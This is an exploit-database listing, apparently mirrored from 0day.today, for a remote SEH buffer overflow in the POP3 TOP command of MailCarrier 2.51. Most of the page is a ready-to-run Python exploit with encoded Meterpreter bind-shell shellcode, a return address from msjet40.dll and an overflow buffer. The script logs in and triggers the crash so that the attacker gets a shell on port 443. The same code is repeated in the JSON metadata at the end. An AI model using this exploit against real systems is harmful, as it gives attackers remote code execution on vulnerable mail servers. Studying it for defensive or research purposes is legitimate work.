Search...

MailCarrier 2.51 - POP3 (TOP) SEH Buffer Overflow Exploit

2019-04-15T00:00:00

ID 1337DAY-ID-32544
Type zdt
Reporter Dino Covotsos
Modified 2019-04-15T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            #!/usr/bin/python
# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "TOP" command(POP3)
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Software Link: N.A
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Created for the Telspace Internship 2019 - SEH Exploit
# POC
# 1.) Change ip, username, password and port in code
# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
#crash at 6175
import sys
import socket
import time

#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f"
"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50"
"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63"
"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f"
"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69"
"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72"
"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e"
"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61"
"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33"
"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b"
"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46"
"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53"
"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70"
"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b"
"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c"
"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64"
"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59"
"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b"
"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33"
"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c"
"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33"
"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38"
"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74"
"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a"
"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48"
"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69"
"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59"
"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45"
"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b"
"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71"
"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52"
"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44"
"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79"
"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b"
"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75"
"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43"
"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66"
"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f"
"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67"
"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b"
"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69"
"\x6f\x78\x55\x41\x41")

buffer = "A" * 6175 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (10000-6883)

print "[*] Mail Server 2.51 POP3 Buffer Overflow in TOP command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 110))
print s.recv(1024)
print "[*] Sending USERNAME\r\n"
s.send('USER test' + '\r\n')
print s.recv(1024)
print "[*] Sending PASSWORD\r\n"
s.send('PASS test' + '\r\n')
print s.recv(1024)
print "[*] Sending TOP command plus evil buffer\r\n"
s.send('TOP ' + buffer + '\r\n')
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, check for meterpreter shell on port 443 of the target!"

#  0day.today [2019-04-17]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-32544", "bulletinFamily": "exploit", "title": "MailCarrier 2.51 - POP3 (TOP) SEH Buffer Overflow Exploit", "description": "Exploit for windows platform in category remote exploits", "published": "2019-04-15T00:00:00", "modified": "2019-04-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/32544", "reporter": "Dino Covotsos", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2019-04-17T19:38:47", "edition": 1, "viewCount": 29, "enchantments": {"dependencies": {"references": [], "modified": "2019-04-17T19:38:47", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2019-04-17T19:38:47", "rev": 2}, "vulnersScore": -0.1}, "sourceHref": "https://0day.today/exploit/32544", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in \"TOP\" command(POP3)\r\n# Exploit Author: Dino Covotsos - Telspace Systems\r\n# Vendor Homepage: https://www.tabslab.com/\r\n# Version: 2.51\r\n# Software Link: N.A\r\n# Contact: services[@]telspace.co.za\r\n# Twitter: @telspacesystems (Greets to the Telspace Crew)\r\n# Tested on: Windows XP Prof SP3 ENG x86\r\n# CVE: TBC from Mitre\r\n# Created for the Telspace Internship 2019 - SEH Exploit\r\n# POC\r\n# 1.) Change ip, username, password and port in code\r\n# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine\r\n#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\\WINDOWS\\system32\\msjet40.dll)\r\n#crash at 6175\r\nimport sys\r\nimport socket\r\nimport time\r\n\r\n#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b \"\\x00\\xd5\\x0a\\x0d\\x1a\\x03\" -f c\r\nshellcode = (\"\\x89\\xe1\\xdb\\xcb\\xd9\\x71\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\"\r\n\"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\"\r\n\"\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\"\r\n\"\\x69\\x6c\\x78\\x68\\x6f\\x72\\x47\\x70\\x37\\x70\\x53\\x30\\x31\\x70\\x4f\"\r\n\"\\x79\\x58\\x65\\x66\\x51\\x49\\x50\\x50\\x64\\x4c\\x4b\\x50\\x50\\x56\\x50\"\r\n\"\\x4e\\x6b\\x56\\x32\\x74\\x4c\\x6e\\x6b\\x50\\x52\\x36\\x74\\x6c\\x4b\\x63\"\r\n\"\\x42\\x36\\x48\\x66\\x6f\\x58\\x37\\x52\\x6a\\x35\\x76\\x76\\x51\\x69\\x6f\"\r\n\"\\x6c\\x6c\\x35\\x6c\\x51\\x71\\x33\\x4c\\x75\\x52\\x64\\x6c\\x47\\x50\\x69\"\r\n\"\\x51\\x4a\\x6f\\x34\\x4d\\x37\\x71\\x38\\x47\\x58\\x62\\x6c\\x32\\x62\\x72\"\r\n\"\\x70\\x57\\x6c\\x4b\\x52\\x72\\x42\\x30\\x4e\\x6b\\x53\\x7a\\x65\\x6c\\x6e\"\r\n\"\\x6b\\x30\\x4c\\x42\\x31\\x33\\x48\\x78\\x63\\x31\\x58\\x55\\x51\\x4b\\x61\"\r\n\"\\x66\\x31\\x6c\\x4b\\x50\\x59\\x37\\x50\\x67\\x71\\x38\\x53\\x6e\\x6b\\x33\"\r\n\"\\x79\\x65\\x48\\x6a\\x43\\x75\\x6a\\x62\\x69\\x6c\\x4b\\x56\\x54\\x6e\\x6b\"\r\n\"\\x37\\x71\\x38\\x56\\x55\\x61\\x39\\x6f\\x4c\\x6c\\x4a\\x61\\x78\\x4f\\x46\"\r\n\"\\x6d\\x37\\x71\\x49\\x57\\x66\\x58\\x69\\x70\\x31\\x65\\x6b\\x46\\x55\\x53\"\r\n\"\\x51\\x6d\\x69\\x68\\x65\\x6b\\x61\\x6d\\x51\\x34\\x74\\x35\\x6a\\x44\\x70\"\r\n\"\\x58\\x6c\\x4b\\x30\\x58\\x55\\x74\\x65\\x51\\x6b\\x63\\x61\\x76\\x6e\\x6b\"\r\n\"\\x76\\x6c\\x30\\x4b\\x6e\\x6b\\x71\\x48\\x47\\x6c\\x33\\x31\\x7a\\x73\\x4c\"\r\n\"\\x4b\\x55\\x54\\x6c\\x4b\\x77\\x71\\x6e\\x30\\x4b\\x39\\x32\\x64\\x34\\x64\"\r\n\"\\x36\\x44\\x61\\x4b\\x51\\x4b\\x45\\x31\\x30\\x59\\x52\\x7a\\x42\\x71\\x59\"\r\n\"\\x6f\\x69\\x70\\x53\\x6f\\x33\\x6f\\x72\\x7a\\x4c\\x4b\\x34\\x52\\x78\\x6b\"\r\n\"\\x6c\\x4d\\x63\\x6d\\x71\\x78\\x50\\x33\\x77\\x42\\x55\\x50\\x53\\x30\\x33\"\r\n\"\\x58\\x70\\x77\\x70\\x73\\x30\\x32\\x31\\x4f\\x61\\x44\\x42\\x48\\x30\\x4c\"\r\n\"\\x54\\x37\\x76\\x46\\x34\\x47\\x59\\x6f\\x78\\x55\\x78\\x38\\x4c\\x50\\x33\"\r\n\"\\x31\\x65\\x50\\x35\\x50\\x35\\x79\\x48\\x44\\x50\\x54\\x30\\x50\\x75\\x38\"\r\n\"\\x56\\x49\\x6f\\x70\\x62\\x4b\\x75\\x50\\x69\\x6f\\x68\\x55\\x73\\x5a\\x74\"\r\n\"\\x4b\\x42\\x79\\x62\\x70\\x79\\x72\\x59\\x6d\\x53\\x5a\\x63\\x31\\x52\\x4a\"\r\n\"\\x67\\x72\\x65\\x38\\x6b\\x5a\\x74\\x4f\\x79\\x4f\\x69\\x70\\x69\\x6f\\x48\"\r\n\"\\x55\\x5a\\x37\\x31\\x78\\x44\\x42\\x73\\x30\\x33\\x31\\x4d\\x6b\\x6e\\x69\"\r\n\"\\x38\\x66\\x70\\x6a\\x76\\x70\\x70\\x56\\x72\\x77\\x53\\x58\\x6f\\x32\\x59\"\r\n\"\\x4b\\x46\\x57\\x73\\x57\\x39\\x6f\\x38\\x55\\x6d\\x55\\x39\\x50\\x43\\x45\"\r\n\"\\x61\\x48\\x53\\x67\\x65\\x38\\x4e\\x57\\x59\\x79\\x66\\x58\\x4b\\x4f\\x6b\"\r\n\"\\x4f\\x59\\x45\\x43\\x67\\x75\\x38\\x51\\x64\\x58\\x6c\\x77\\x4b\\x39\\x71\"\r\n\"\\x69\\x6f\\x49\\x45\\x32\\x77\\x4d\\x47\\x42\\x48\\x43\\x45\\x32\\x4e\\x52\"\r\n\"\\x6d\\x50\\x61\\x4b\\x4f\\x39\\x45\\x52\\x4a\\x67\\x70\\x53\\x5a\\x74\\x44\"\r\n\"\\x73\\x66\\x42\\x77\\x53\\x58\\x43\\x32\\x7a\\x79\\x39\\x58\\x63\\x6f\\x79\"\r\n\"\\x6f\\x6e\\x35\\x4d\\x53\\x4c\\x38\\x65\\x50\\x73\\x4e\\x46\\x4d\\x4e\\x6b\"\r\n\"\\x66\\x56\\x30\\x6a\\x57\\x30\\x65\\x38\\x33\\x30\\x62\\x30\\x77\\x70\\x75\"\r\n\"\\x50\\x63\\x66\\x70\\x6a\\x65\\x50\\x52\\x48\\x61\\x48\\x39\\x34\\x61\\x43\"\r\n\"\\x69\\x75\\x69\\x6f\\x38\\x55\\x7a\\x33\\x50\\x53\\x31\\x7a\\x45\\x50\\x66\"\r\n\"\\x36\\x51\\x43\\x76\\x37\\x31\\x78\\x43\\x32\\x69\\x49\\x6f\\x38\\x51\\x4f\"\r\n\"\\x4b\\x4f\\x39\\x45\\x4d\\x53\\x69\\x68\\x43\\x30\\x63\\x4e\\x73\\x37\\x67\"\r\n\"\\x71\\x4a\\x63\\x44\\x69\\x5a\\x66\\x73\\x45\\x38\\x69\\x6a\\x63\\x6f\\x4b\"\r\n\"\\x4a\\x50\\x4c\\x75\\x4e\\x42\\x42\\x76\\x33\\x5a\\x37\\x70\\x63\\x63\\x69\"\r\n\"\\x6f\\x78\\x55\\x41\\x41\")\r\n\r\nbuffer = \"A\" * 6175 + \"\\xeb\\x11\\x90\\x90\" + \"\\x0c\\x11\\x0d\\x1b\" + \"\\x90\" * 20 + shellcode + \"D\" * (10000-6883)\r\n\r\nprint \"[*] Mail Server 2.51 POP3 Buffer Overflow in TOP command\\r\\n\"\r\nprint \"[*] Sending pwnage buffer: with %s bytes...\" %len(buffer)\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nconnect=s.connect((\"192.168.0.150\", 110))\r\nprint s.recv(1024)\r\nprint \"[*] Sending USERNAME\\r\\n\"\r\ns.send('USER test' + '\\r\\n')\r\nprint s.recv(1024)\r\nprint \"[*] Sending PASSWORD\\r\\n\"\r\ns.send('PASS test' + '\\r\\n')\r\nprint s.recv(1024)\r\nprint \"[*] Sending TOP command plus evil buffer\\r\\n\"\r\ns.send('TOP ' + buffer + '\\r\\n')\r\ns.send('QUIT\\r\\n')\r\ns.close()\r\ntime.sleep(1)\r\nprint \"[*] Done, check for meterpreter shell on port 443 of the target!\"\n\n# 0day.today [2019-04-17] #"}